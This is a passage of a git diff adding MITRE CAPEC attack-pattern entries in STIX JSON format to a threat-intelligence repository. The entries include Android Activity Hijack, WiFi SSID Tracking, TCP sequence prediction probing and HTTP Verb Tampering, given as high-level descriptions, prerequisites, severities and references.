"Software" + ], + "x_capec_extended_description": "\n For this purpose \"Port Unreachable\" error messages are often used, as generating them requires the adversary to send a UDP datagram to a closed port on the target. The goal of this analysis to make inferences about the type of operating system or firmware that sent the error message in reply.\n This is useful for identifying unique characteristics of operating systems because the RFC-1122 expected behavior reads: \"Every ICMP error message includes the Internet header and at least the first 8 data octets of the datagram that triggered the error; more than 8 octets MAY be sent [...].\" This contrasts with RFC-792 expected behavior, which limited the quoted text to 64 bits (8 octets). 
Given the latitude in the specification the resulting RFC-1122 stack implementations often respond with a high degree of variability in the amount of data quoted in the error message because \"older\" or \"legacy\" stacks may comply with the RFC-792 specification, while other stacks may choose a longer format in accordance with RFC-1122. As a general rule most operating systems or firmware will quote the first 8 bytes of the datagram triggering the error, but some IP stacks will quote more than the first 8 bytes of data.\n ", + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "The ability to monitor and interact with network communications.Access to at least one host, and the privileges to interface with the network interface card." + ], + "x_capec_resources_required": [ + "A tool capable of sending/receiving UDP datagram packets from a remote system to a closed port and receive an ICMP Error Message Type 3, \"Port Unreachable.." + ], + "x_capec_status": "Stable", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--10ce28bf-9f93-4a45-a39e-6407141a34d4.json b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--10ce28bf-9f93-4a45-a39e-6407141a34d4.json new file mode 100644 index 0000000000000000000000000000000000000000..702b8c542cbaa687ffe64bb99ad1a6d1f35a6fd3 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--10ce28bf-9f93-4a45-a39e-6407141a34d4.json 
@@ -0,0 +1,64 @@ +{ + "id": "bundle--d682dbcb-07ca-4e22-a664-4724cafe23af", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary intercepts an implicit intent sent to launch a Android-based trusted activity and instead launches a counterfeit activity in its place. The malicious activity is then used to mimic the trusted activity's user interface and prompt the target to enter sensitive data as if they were interacting with the trusted activity.", + "external_references": [ + { + "external_id": "CAPEC-501", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/501.html" + }, + { + "external_id": "CWE-923", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/923.html" + }, + { + "description": "Erika Chin, Adrienne Porter Felt, Kate Greenwood, David Wagner, Analyzing Inter-Application Communication in Android, 2011, International Conference on Mobile Systems, Applications, and Services (MobiSys)", + "external_id": "REF-427", + "source_name": "reference_from_CAPEC", + "url": "https://people.eecs.berkeley.edu/~daw/papers/intents-mobisys11.pdf" + } + ], + "id": "attack-pattern--10ce28bf-9f93-4a45-a39e-6407141a34d4", + "modified": "2021-10-21T00:00:00.000Z", + "name": "Android Activity Hijack", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--48f21dcd-2490-49c6-9690-1cb586b201f4", + "attack-pattern--fc3a9a6f-66c9-4363-8ebd-9bd18725fff8" + ], + "x_capec_consequences": { + "Confidentiality": [ + "Read Data" + ] + }, + "x_capec_domains": [ + "Software", + "Software" + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Find an android application that uses implicit intents: Since this attack only works on android applications that use implicit intents, rather than explicit intents, an adversary must first identify an app that uses implicit intents to launch an Android-based trusted activity, and what that activity is.

Experiment

  1. Create a malicious app: The adversary must create a malicious android app meant to intercept implicit intents to launch an Adroid-based trusted activity. This malicious app will mimic the trusted activiy's user interface to get the user to enter sensitive data.

  2. Techniques
    Specify the type of intent wished to be intercepted in the malicious app's manifest file using an intent filter
  3. Get user to download malicious app: The adversary must get a user using the targeted app to download the malicious app by any means necessary

Exploit

  1. Gather sensitive data through malicious app: Once the target application sends an implicit intent to launch a trusted activity, the malicious app will be launched instead that looks identical to the interface of that activity. When the user enters sensitive information it will be captured by the malicious app.

  2. Techniques
    Gather login information from a user using a malicious app
", + "x_capec_prerequisites": [ + "The adversary must have previously installed the malicious application onto the Android device that will run in place of the trusted activity." + ], + "x_capec_resources_required": [ + "Malware capable of acting on the adversary's objectives." + ], + "x_capec_skills_required": { + "High": "The adversary must typically overcome network and host defenses in order to place malware on the system." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--11d7e0d6-5655-4fc7-aee8-e2e0fc6c5088.json b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--11d7e0d6-5655-4fc7-aee8-e2e0fc6c5088.json new file mode 100644 index 0000000000000000000000000000000000000000..e39f7263307391caea16e3dd5adcadcecafd12ff --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--11d7e0d6-5655-4fc7-aee8-e2e0fc6c5088.json 
@@ -0,0 +1,53 @@
+{
+ "id": "bundle--8efa1452-d03c-417d-998f-1f833db3c07c",
+ "objects": [
+ {
+ "created": "2015-11-09T00:00:00.000Z",
+ "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd",
+ "description": "In this attack scenario, the attacker passively listens for WiFi management frame messages containing the Service Set Identifier (SSID) for the WiFi network. These messages are frequently transmitted by WiFi access points (e.g., the retransmission device) as well as by clients that are accessing the network (e.g., the handset/mobile device). Once the attacker is able to associate an SSID with a particular user or set of users (for example, when attending a public event), the attacker can then scan for this SSID to track that user in the future.",
+ "external_references": [
+ {
+ "external_id": "CAPEC-613",
+ "source_name": "capec",
+ "url": "https://capec.mitre.org/data/definitions/613.html"
+ },
+ {
+ "external_id": "CWE-201",
+ "source_name": "cwe",
+ "url": "http://cwe.mitre.org/data/definitions/201.html"
+ },
+ {
+ "external_id": "CWE-300",
+ "source_name": "cwe",
+ "url": "http://cwe.mitre.org/data/definitions/300.html"
+ }
+ ],
+ "id": "attack-pattern--11d7e0d6-5655-4fc7-aee8-e2e0fc6c5088",
+ "modified": "2019-09-30T00:00:00.000Z",
+ "name": "WiFi SSID Tracking",
+ "object_marking_refs": [
+ "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d"
+ ],
+ "spec_version": "2.1",
+ "type": "attack-pattern",
+ "x_capec_abstraction": "Detailed",
+ "x_capec_child_of_refs": [
+ "attack-pattern--d780db94-413f-402d-a4d9-cf179b316c8c"
+ ],
+ "x_capec_domains": [
+ "Communications",
+ "Software"
+ ],
+ "x_capec_prerequisites": [
+ "None"
+ ],
+ "x_capec_skills_required": {
+ "Low": "Open source and commercial software tools are available and open databases of known WiFi SSID addresses are available online."
+ },
+ "x_capec_status": "Draft",
+ "x_capec_typical_severity": "Low",
+ "x_capec_version": "3.9"
+ }
+ ],
+ "type": "bundle"
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--123b3182-a540-4b15-ac28-0fbf607f9ebf.json b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--123b3182-a540-4b15-ac28-0fbf607f9ebf.json
new file mode 100644
index 0000000000000000000000000000000000000000..af382c1312db5d559b3346c944da8d380f20cf3a
--- /dev/null
+++ b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--123b3182-a540-4b15-ac28-0fbf607f9ebf.json
@@ -0,0 +1,29 @@
+{
+ "id": "bundle--11689e7a-d662-4cfa-814f-8a2e94683428",
+ "objects": [
+ {
+ "created": "2014-06-23T00:00:00.000Z",
+ "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd",
+ "description": "This attack pattern has been deprecated as it was deemed not to be a legitimate attack pattern.",
+ "external_references": [
+ {
+ "external_id": "CAPEC-257",
+ "source_name": "capec",
+ "url": "https://capec.mitre.org/data/definitions/257.html"
+ }
+ ],
+ "id": "attack-pattern--123b3182-a540-4b15-ac28-0fbf607f9ebf",
+ "modified": "2018-07-31T00:00:00.000Z",
+ "name": "DEPRECATED: Abuse of Transaction Data Structure",
+ "object_marking_refs": [
+ "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d"
+ ],
+ "spec_version": "2.1",
+ "type": "attack-pattern",
+ "x_capec_abstraction": "Meta",
+ "x_capec_status": "Deprecated",
+ "x_capec_version": "3.9"
+ }
+ ],
+ "type": "bundle"
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--12d80b47-8e4c-4646-bcc3-2bd7059a44e1.json b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--12d80b47-8e4c-4646-bcc3-2bd7059a44e1.json
new file mode 100644
index 0000000000000000000000000000000000000000..433bbda16a61d3c952c143d0c57b7cc94415e420
--- /dev/null
+++ b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--12d80b47-8e4c-4646-bcc3-2bd7059a44e1.json
@@ -0,0 +1,85 @@ +{ + "id": "bundle--d78ba103-338b-462f-a8db-153e92284a36", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This type of operating system probe attempts to determine an estimate for how predictable the sequence number generation algorithm is for a remote host. Statistical techniques, such as standard deviation, can be used to determine how predictable the sequence number generation is for a system. This result can then be compared to a database of operating system behaviors to determine a likely match for operating system and version.", + "external_references": [ + { + "external_id": "CAPEC-324", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/324.html" + }, + { + "external_id": "CWE-200", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/200.html" + }, + { + "description": "Stuart McClure, Joel Scambray, George Kurtz, Hacking Exposed: Network Security Secrets & Solutions (6th Edition), 2009, McGraw Hill", + "external_id": "REF-33", + "source_name": "reference_from_CAPEC" + }, + { + "description": "Defense Advanced Research Projects Agency Information Processing Techniques Office, Information Sciences Institute University of Southern California, RFC793 - Transmission Control Protocol, 1981--09, Defense Advanced Research Projects Agency (DARPA)", + "external_id": "REF-128", + "source_name": "reference_from_CAPEC", + "url": "http://www.faqs.org/rfcs/rfc793.html" + }, + { + "description": "Gordon \"Fyodor\" Lyon, Nmap Network Scanning: The Official Nmap Project Guide to Network Discovery and Security Scanning (3rd \"Zero Day\" Edition,), 2008, Insecure.com LLC", + "external_id": "REF-212", + "source_name": "reference_from_CAPEC" + }, + { + "description": "Gordon \"Fyodor\" Lyon, The Art of Port Scanning (Volume: 7, Issue. 
51), Phrack Magazine, 1997", + "external_id": "REF-130", + "source_name": "reference_from_CAPEC", + "url": "http://phrack.org/issues/51/11.html" + } + ], + "id": "attack-pattern--12d80b47-8e4c-4646-bcc3-2bd7059a44e1", + "modified": "2018-07-31T00:00:00.000Z", + "name": "TCP (ISN) Sequence Predictability Probe", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--6227a1fc-7504-4a5f-b5b2-4c4f1fe38617" + ], + "x_capec_consequences": { + "Access_Control": [ + "Bypass Protection Mechanism", + "Hide Activities" + ], + "Authorization": [ + "Bypass Protection Mechanism", + "Hide Activities" + ], + "Confidentiality": [ + "Read Data", + "Bypass Protection Mechanism", + "Hide Activities" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "The ability to monitor and interact with network communications.Access to at least one host, and the privileges to interface with the network interface card." + ], + "x_capec_resources_required": [ + "A tool capable of sending and receiving packets from a remote system." + ], + "x_capec_status": "Stable", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--12de9227-495b-49b2-859f-334a20197ba3.json b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--12de9227-495b-49b2-859f-334a20197ba3.json new file mode 100644 index 0000000000000000000000000000000000000000..1f2e05718aa81cbe7e2c8cd776653d795d79643c --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--12de9227-495b-49b2-859f-334a20197ba3.json 
@@ -0,0 +1,59 @@
+{
+ "id": "bundle--cad44c79-b3ba-42d6-93ce-89cdb3befa22",
+ "objects": [
+ {
+ "created": "2014-06-23T00:00:00.000Z",
+ "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd",
+ "description": "An adversary exploits weaknesses in input validation by manipulating resource identifiers enabling the unintended modification or specification of a resource.",
+ "external_references": [
+ {
+ "external_id": "CAPEC-240",
+ "source_name": "capec",
+ "url": "https://capec.mitre.org/data/definitions/240.html"
+ },
+ {
+ "external_id": "CWE-99",
+ "source_name": "cwe",
+ "url": "http://cwe.mitre.org/data/definitions/99.html"
+ },
+ {
+ "description": "Resource Injection",
+ "source_name": "OWASP Attacks",
+ "url": "https://owasp.org/www-community/attacks/Resource_Injection"
+ }
+ ],
+ "id": "attack-pattern--12de9227-495b-49b2-859f-334a20197ba3",
+ "modified": "2020-12-17T00:00:00.000Z",
+ "name": "Resource Injection",
+ "object_marking_refs": [
+ "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d"
+ ],
+ "spec_version": "2.1",
+ "type": "attack-pattern",
+ "x_capec_abstraction": "Meta",
+ "x_capec_consequences": {
+ "Confidentiality": [
+ "Read Data"
+ ],
+ "Integrity": [
+ "Modify Data"
+ ]
+ },
+ "x_capec_domains": [
+ "Communications",
+ "Software"
+ ],
+ "x_capec_likelihood_of_attack": "High",
+ "x_capec_parent_of_refs": [
+ "attack-pattern--b5cd5231-d7ef-4366-b713-a44d3f1134b4"
+ ],
+ "x_capec_prerequisites": [
+ "The target application allows the user to both specify the identifier used to access a system resource. Through this permission, the user gains the capability to perform actions on that resource (e.g., overwrite the file)"
+ ],
+ "x_capec_status": "Stable",
+ "x_capec_typical_severity": "High",
+ "x_capec_version": "3.9"
+ }
+ ],
+ "type": "bundle"
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--1339dbbe-fe41-467a-b43c-7d56d22a9fe4.json b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--1339dbbe-fe41-467a-b43c-7d56d22a9fe4.json
new file mode 100644
index 0000000000000000000000000000000000000000..c887de2ca98c1d6945525a17ca5bd26c63d321a8
--- /dev/null
+++ b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--1339dbbe-fe41-467a-b43c-7d56d22a9fe4.json
@@ -0,0 +1,65 @@ +{ + "id": "bundle--e26b8616-972a-47ce-bee1-2c335e9181c6", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker modifies a technology, product, or component during a stage in its manufacture for the purpose of carrying out an attack against some entity involved in the supply chain lifecycle. There are an almost limitless number of ways an attacker can modify a technology when they are involved in its manufacture, as the attacker has potential inroads to the software composition, hardware design and assembly, firmware, or basic design mechanics. Additionally, manufacturing of key components is often outsourced with the final product assembled by the primary manufacturer. The greatest risk, however, is deliberate manipulation of design specifications to produce malicious hardware or devices. There are billions of transistors in a single integrated circuit and studies have shown that fewer than 10 transistors are required to create malicious functionality.", + "external_references": [ + { + "external_id": "CAPEC-438", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/438.html" + }, + { + "description": "Supply Chain Compromise", + "external_id": "T1195", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1195" + }, + { + "description": "Jon Boyens, Angela Smith, Nadya Bartol, Kris Winkler, Alex Holbrook, Matthew Fallon, Cybersecurity Supply Chain Risk Management Practices for Systems and Organizations (2nd Draft), 2021--10---28, National Institute of Standards and Technology (NIST)", + "external_id": "REF-379", + "source_name": "reference_from_CAPEC", + "url": "https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-161r1-draft2.pdf" + }, + { + "description": "Marcus Sachs, Supply Chain Attacks: Can We Secure Information Technology Supply Chain in the Age of Globalization, Verizon, 
Inc.", + "external_id": "REF-380", + "source_name": "reference_from_CAPEC" + }, + { + "description": "Thea Reilkoff, Hardware Trojans: A Novel Attack Meets a New Defense, 2010, Yale School of Engineering and Applied Science", + "external_id": "REF-381", + "source_name": "reference_from_CAPEC" + }, + { + "description": "Marianne Swanson, Nadya Bartol, Rama Moorthy, Piloting Supply Chain Risk Management Practices for Federal Information Systems (Draft NISTIR 7622), 2010, National Institute of Standards and Technology", + "external_id": "REF-382", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--1339dbbe-fe41-467a-b43c-7d56d22a9fe4", + "modified": "2021-06-24T00:00:00.000Z", + "name": "Modification During Manufacture", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Meta", + "x_capec_domains": [ + "Supply Chain", + "Software", + "Hardware" + ], + "x_capec_parent_of_refs": [ + "attack-pattern--efb74200-657d-438c-aaff-bbd9644dd72d", + "attack-pattern--cf550376-63ac-4b46-87d1-0e324c1c1c46" + ], + "x_capec_status": "Draft", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--13b94aaa-9c95-487c-ad68-8c29d8ac0068.json b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--13b94aaa-9c95-487c-ad68-8c29d8ac0068.json new file mode 100644 index 0000000000000000000000000000000000000000..0015a72e0a704daeb031fdd25d3e20be1bdb7c15 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--13b94aaa-9c95-487c-ad68-8c29d8ac0068.json 
@@ -0,0 +1,53 @@ +{ + "id": "bundle--7dadb93b-5322-4b16-811c-f211aab9a108", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary installs or adds malicious logic (also known as malware) into a seemingly benign component of a fielded system. This logic is often hidden from the user of the system and works behind the scenes to achieve negative impacts. With the proliferation of mass digital storage and inexpensive multimedia devices, Bluetooth and 802.11 support, new attack vectors for spreading malware are emerging for things we once thought of as innocuous greeting cards, picture frames, or digital projectors. This pattern of attack focuses on systems already fielded and used in operation as opposed to systems and their components that are still under development and part of the supply chain.", + "external_references": [ + { + "external_id": "CAPEC-441", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/441.html" + }, + { + "external_id": "CWE-284", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/284.html" + } + ], + "id": "attack-pattern--13b94aaa-9c95-487c-ad68-8c29d8ac0068", + "modified": "2018-07-31T00:00:00.000Z", + "name": "Malicious Logic Insertion", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Meta", + "x_capec_consequences": { + "Authorization": [ + "Execute Unauthorized Commands" + ] + }, + "x_capec_domains": [ + "Software", + "Hardware" + ], + "x_capec_likelihood_of_attack": "Medium", + "x_capec_parent_of_refs": [ + "attack-pattern--66112136-aa17-4300-aef8-d7a42ebc6e38", + "attack-pattern--4cfba0b3-4740-49ae-bbb4-2dad27886239", + "attack-pattern--dc05cb9b-00ae-4fd0-8743-b1fb507ea1d3" + ], + "x_capec_prerequisites": [ + "Access to the component currently deployed at a victim 
location." + ], + "x_capec_status": "Stable", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--13d1d169-0023-41e2-952f-7d794844733b.json b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--13d1d169-0023-41e2-952f-7d794844733b.json new file mode 100644 index 0000000000000000000000000000000000000000..9decdec517475dcc5a8b208e6c95a7064391db80 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--13d1d169-0023-41e2-952f-7d794844733b.json 
@@ -0,0 +1,58 @@ +{ + "id": "bundle--1283bd89-4a96-4e99-9a70-60d628ee9b35", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker modifies the HTTP Verb (e.g. GET, PUT, TRACE, etc.) in order to bypass access restrictions. Some web environments allow administrators to restrict access based on the HTTP Verb used with requests. However, attackers can often provide a different HTTP Verb, or even provide a random string as a verb in order to bypass these protections. This allows the attacker to access data that should otherwise be protected.", + "external_references": [ + { + "external_id": "CAPEC-274", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/274.html" + }, + { + "external_id": "CWE-302", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/302.html" + }, + { + "external_id": "CWE-654", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/654.html" + }, + { + "description": "Arshan Dabirsiaghi, Bypassing Web Authentication and Authorization with HTTP Verb Tampering: How to inadvertently allow attackers full access to your web application, Aspect Security", + "external_id": "REF-118", + "source_name": "reference_from_CAPEC", + "url": "http://mirror.transact.net.au/sourceforge/w/project/wa/waspap/waspap/Core/Bypassing_VBAAC_with_HTTP_Verb_Tampering.pdf" + } + ], + "id": "attack-pattern--13d1d169-0023-41e2-952f-7d794844733b", + "modified": "2019-09-30T00:00:00.000Z", + "name": "HTTP Verb Tampering", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--9c983530-1927-43ca-addd-63d149cda4a7" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_prerequisites": [ + "The targeted system must attempt to filter access based 
on the HTTP verb used in requests." + ], + "x_capec_resources_required": [ + "The attacker requires a tool that allows them to manually control the HTTP verb used to send messages to the targeted server." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--13e147c3-7baa-4ec4-aafd-9135d46545cc.json b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--13e147c3-7baa-4ec4-aafd-9135d46545cc.json new file mode 100644 index 0000000000000000000000000000000000000000..2314680ed4d2c3b9c2006a8de9105d2a9b3a9484 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--13e147c3-7baa-4ec4-aafd-9135d46545cc.json 
@@ -0,0 +1,51 @@ +{ + "id": "bundle--4510fc1b-17b0-4be6-a403-b391ba609970", + "objects": [ + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "When an operating system starts, it also starts programs called services or daemons. Modifying existing services may break existing services or may enable services that are disabled/not commonly used.", + "external_references": [ + { + "external_id": "CAPEC-551", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/551.html" + }, + { + "external_id": "CWE-284", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/284.html" + }, + { + "external_id": "CWE-522", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/522.html" + }, + { + "description": "Create or Modify System Process", + "external_id": "T1543", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1543" + } + ], + "id": "attack-pattern--13e147c3-7baa-4ec4-aafd-9135d46545cc", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Modify Existing Service", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--482cb9fc-0122-49f0-b6df-6d2d42098b0a" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_status": "Draft", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--140142cc-28cb-4506-bce6-b44128b7b9a7.json b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--140142cc-28cb-4506-bce6-b44128b7b9a7.json new file mode 100644 index 0000000000000000000000000000000000000000..2e96944d7f0f8e6887fd2c8ae06ba76f8e13d70f --- /dev/null 
+++ b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--140142cc-28cb-4506-bce6-b44128b7b9a7.json 
@@ -0,0 +1,68 @@ +{ + "id": "bundle--1fa5737d-ae59-42f4-b4be-84e0c9983849", + "objects": [ + { + "created": "2018-07-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary gathers sensitive information by exploiting the system's screen capture functionality. Through screenshots, the adversary aims to see what happens on the screen over the course of an operation. The adversary can leverage information gathered in order to carry out further attacks.", + "external_references": [ + { + "external_id": "CAPEC-648", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/648.html" + }, + { + "external_id": "CWE-267", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/267.html" + }, + { + "description": "Screen Capture", + "external_id": "T1113", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1113" + }, + { + "description": "Screen Capture", + "external_id": "T1513", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1513" + } + ], + "id": "attack-pattern--140142cc-28cb-4506-bce6-b44128b7b9a7", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Collect Data from Screen Capture", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--797f4b4e-371a-4d06-9e98-5cccb8a7ebc1" + ], + "x_capec_consequences": { + "Confidentiality": [ + "Read Data (The adversary is able to capture potentially sensitive information and processes as they appear on the screen.)" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "The adversary must have obtained logical access to the system by some means (e.g., via obtained credentials or planting malware on the system)." 
+ ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack." + ], + "x_capec_skills_required": { + "Low": "Once the adversary has logical access (which can potentially require high knowledge and skill level), the adversary needs only to leverage the relevant command for screen capture." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--14ed805a-65a4-45c2-8e4e-626f22226465.json b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--14ed805a-65a4-45c2-8e4e-626f22226465.json new file mode 100644 index 0000000000000000000000000000000000000000..ceaf7071cc284f8a9d4abb9577c175daa4239105 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--14ed805a-65a4-45c2-8e4e-626f22226465.json 
@@ -0,0 +1,92 @@ +{ + "id": "bundle--8eb54728-98d7-47c9-b501-cd2f38a65bc7", + "objects": [ + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary with the ability to alter tools used in a development environment causes software to be developed with maliciously modified tools. Such tools include requirements management and database tools, software design tools, configuration management tools, compilers, system build tools, and software performance testing and load testing tools. The adversary then carries out malicious acts once the software is deployed including malware infection of other systems to support further compromises.", + "external_references": [ + { + "external_id": "CAPEC-670", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/670.html" + }, + { + "description": "Trusted Developer Utilities Proxy Execution", + "external_id": "T1127", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1127" + }, + { + "description": "Supply Chain Compromise: Compromise Software Dependencies and Development Tools", + "external_id": "T1195.001", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1195/001" + }, + { + "description": "Melinda Reed, John F. Miller, Paul Popick, Supply Chain Attack Patterns: Framework and Catalog, 2014--08, Office of the Assistant Secretary of Defense for Research and Engineering", + "external_id": "REF-660", + "source_name": "reference_from_CAPEC", + "url": "https://docplayer.net/13041016-Supply-chain-attack-patterns-framework-and-catalog.html" + }, + { + "description": "John F. 
